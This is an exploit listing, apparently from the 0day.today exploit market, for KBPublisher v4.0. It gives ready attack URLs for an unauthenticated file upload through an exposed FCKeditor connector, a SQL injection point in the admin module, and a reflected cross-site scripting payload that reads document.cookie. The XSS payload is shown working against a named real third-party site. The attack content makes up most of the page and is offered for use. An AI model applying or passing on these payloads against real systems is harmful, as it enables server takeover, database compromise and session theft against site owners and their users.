[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KBPublisher v4.0 Multiple Vulnerabilties

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18467
Category
web applications
Date add
07-06-2012
Platform
php
KBPublisher v4.0  Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.kbpublisher.com/
.:. Tested On Demo : http://demo.kbpublisher.com/kb/admin
#######################################################################

===[ Exploit ]===


Remote Arbitrary File Upload
=============================

http://SITE/admin/tools/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://SITE/admin/tools/FCKeditor/editor/filemanager/connectors/php/connector.php

Your File:
http://SITE/images/image/


Sql Injection
==============

http://SITE/admin/index.php?module=knowledgebase&page=kb_entry&action=update&id=191[sql]


Reflected Xss
==============


https://SITE/?&sid="><script>alert(document.cookie)</script>

Example:

https://wfsm.webfarm.co.nz/kb/?&sid="><script>alert(document.cookie)</script>


####################################################################### 



#  0day.today [2024-07-02]  #